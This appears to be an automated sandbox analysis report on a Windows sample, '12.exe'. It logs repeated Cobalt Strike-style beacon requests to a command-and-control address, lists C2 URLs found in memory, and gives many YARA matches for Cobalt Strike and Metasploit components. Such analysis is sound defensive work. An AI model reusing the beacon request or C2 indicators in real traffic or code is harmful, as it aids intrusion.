                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: GET /cx HTTP/1.1Accept: */*Cookie: FsPTOAWbYM/l7TkjAD+lEbBpclOsg9+5CnXs9iJ3EforKeT1S3uAKIXmv+FEmZwBGHCVtYSmr/rp2V4OuFnh/QsN9z8/URr5Ks1TYq1YIh1KhYDMHf7N8i+/IsUWro5AcnEdaipIcAkHULgpq9npVEmyi5G8vzoV4+7Sb0hARVM=User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727)Host: 152.42.226.16:59060Connection: Keep-AliveCache-Control: no-cache
                    Source: 12.exe, 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp | String found in binary or memory: http://127.0.0.1:%u/
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp, 12.exe, 00000000.00000002.4124793161.000000000074E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cx
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cx1.
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cx26.16:59060/cx
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cxA-
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cxN-
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cxS-i)
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cxj-v)
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cxmswsock.dll.muiW=L)
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cxwshqos.dll.mui
                    Source: 12.exe, 00000000.00000002.4124793161.0000000000793000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://152.42.226.16:59060/cxwshqos.dll.muip

                    System Summary

                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Identifies the API address lookup function leveraged by metasploit shellcode Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies the API address lookup function leveraged by metasploit shellcode Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Rule for beacon reflective loader Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Identifies the API address lookup function leveraged by metasploit shellcode Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 0.2.12.exe.d70000.1.unpack, type: UNPACKEDPE | Matched rule: CobaltStrike payload Author: ditekSHen
                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the API address lookup function leveraged by metasploit shellcode Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DE8000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 00000000.00000002.4124981749.0000000000DB0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Rule for beacon reflective loader Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the API address lookup function leverage by metasploit shellcode Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families. Author: unknown
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Meterpreter Beacon - file K5om.dll Author: Florian Roth
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike sample from Leviathan report Author: Florian Roth
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Cobalt Strike loader Author: @VK_Intel
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: detects Reflective DLL injection artifacts Author: ditekSHen
                    Source: 00000000.00000002.4124957822.0000000000D70000.00000020.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: CobaltStrike payload Author: ditekSHen
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Attempts to detect Cobalt Strike based on strings found in BEACON Author: unknown
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Detects unmodified CobaltStrike beacon DLL Author: yara@s3c.za.net
                    Source: Process Memory Space: 12.exe PID: 7324, type: MEMORYSTRMatched rule: Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip Author: Florian Roth
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DB4763 CreateProcessWithLogonW,GetLastError,_memset,GetLastError
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D940FD
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D8A1DB
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD8190
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD7320
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D944D1
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D97590
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D96720
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D948DD
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD4828
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D8282F
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DC59E9
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD7BC0
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D94CFD
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D93C28
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DCADDB
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D84DE9
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D96D45
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00D96FC0
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD50D1
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD58FD
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD4828
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DC59E9
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD8190
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD7945
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD7BC0
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD7320
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD54DD
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DD4CFD
                    Source: C:\Users\user\Desktop\12.exe, Code function: 0_2_00DCADDB
                    Source: C:\Users\user\Desktop\12.exe, Code function: String function: 00DCB3A4 appears 76 times
                    Source: C:\Users\user\Desktop\12.exe, Code function: String function: 00DCA7D0 appears 46 times
                    Source: C:\Users\user\Desktop\12.exe, Code function: String function: 00D8A7A4 appears 35 times
                    Source: 12.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, DEBUG_STRIPPED
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.db0000.2.raw.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: Leviathan_CobaltStrike_Sample_1 date = 2017-10-18, hash1 = 5860ddc428ffa900258207e9c385f843a3472f2fbf252d2f6357d458646cf362, author = Florian Roth, description = Detects Cobalt Strike sample from Leviathan report, reference = https://goo.gl/MZ7dRg, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: crime_win32_csbeacon_1 date = 2020-03-16, author = @VK_Intel, description = Detects Cobalt Strike loader, reference = https://twitter.com/VK_Intel/status/1239632822358474753
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: WiltedTulip_ReflectiveLoader date = 2017-07-23, hash5 = eee430003e7d59a431d1a60d45e823d4afb0d69262cc5e0c79f345aa37333a89, hash4 = cf7c754ceece984e6fa0d799677f50d93133db609772c7a2226e7746e6d046f0, hash3 = a159a9bfb938de686f6aced37a2f7fa62d6ff5e702586448884b70804882b32f, hash2 = 1f52d643e8e633026db73db55eb1848580de00a203ee46263418f02c6bdb8c7a, hash1 = 1097bf8f5b832b54c81c1708327a54a88ca09f7bdab4571f1a335cc26bbd7904, author = Florian Roth, description = Detects reflective loader (Cobalt Strike) used in Operation Wilted Tulip, reference = http://www.clearskysec.com/tulip, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: INDICATOR_SUSPICIOUS_ReflectiveLoader author = ditekSHen, description = detects Reflective DLL injection artifacts
                    Source: 0.2.12.exe.db0000.2.unpack, type: UNPACKEDPE, Matched rule: MALWARE_Win_CobaltStrike author = ditekSHen, description = CobaltStrike payload
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_ee756db7 os = windows, severity = x86, description = Attempts to detect Cobalt Strike based on strings found in BEACON, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = e589cc259644bc75d6c4db02a624c978e855201cf851c0d87f0d54685ce68f71, id = ee756db7-e177-41f0-af99-c44646d334f7, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_CobaltStrike_f0b627fc reference_sample = b362951abd9d96d5ec15d281682fa1c8fe8f8e4e2f264ca86f6b061af607f79b, os = windows, severity = x86, description = Rule for beacon reflective loader, creation_date = 2021-10-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.CobaltStrike, fingerprint = fbc94bedd50b5b943553dd438a183a1e763c098a385ac3a4fc9ff24ee30f91e1, id = f0b627fc-97cd-42cb-9eae-1efb0672762d, last_modified = 2022-01-13
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Metasploit_7bc0f998 os = windows, severity = x86, description = Identifies the API address lookup function leverage by metasploit shellcode, creation_date = 2021-03-23, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = fdb5c665503f07b2fc1ed7e4e688295e1222a500bfb68418661db60c8e75e835, id = 7bc0f998-7014-4883-8a56-d5ee00c15aed, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Metasploit_c9773203 os = windows, severity = x86, description = Identifies the 64 bit API hashing function used by Metasploit. This has been re-used by many other malware families., creation_date = 2021-04-07, scan_context = file, memory, reference = https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/external/source/shellcode/windows/x64/src/block/block_api.asm, license = Elastic License v2, threat_name = Windows.Trojan.Metasploit, fingerprint = afde93eeb14b4d0c182f475a22430f101394938868741ffa06445e478b6ece36, id = c9773203-6d1e-4246-a1e0-314217e0207a, last_modified = 2021-08-23
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: Beacon_K5om date = 2017-06-07, hash1 = e3494fd2cc7e9e02cff76841630892e4baed34a3e1ef2b9ae4e2608f9a4d7be9, author = Florian Roth, description = Detects Meterpreter Beacon - file K5om.dll, reference = https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: 0.2.12.exe.d70000.1.raw.unpack, type: UNPACKEDPE, Matched rule: CobaltStrike_Unmodifed_Beacon date = 2019-08-16, author = yara@s3c.za.net, description = Detects unmodified CobaltStrike beacon DLL
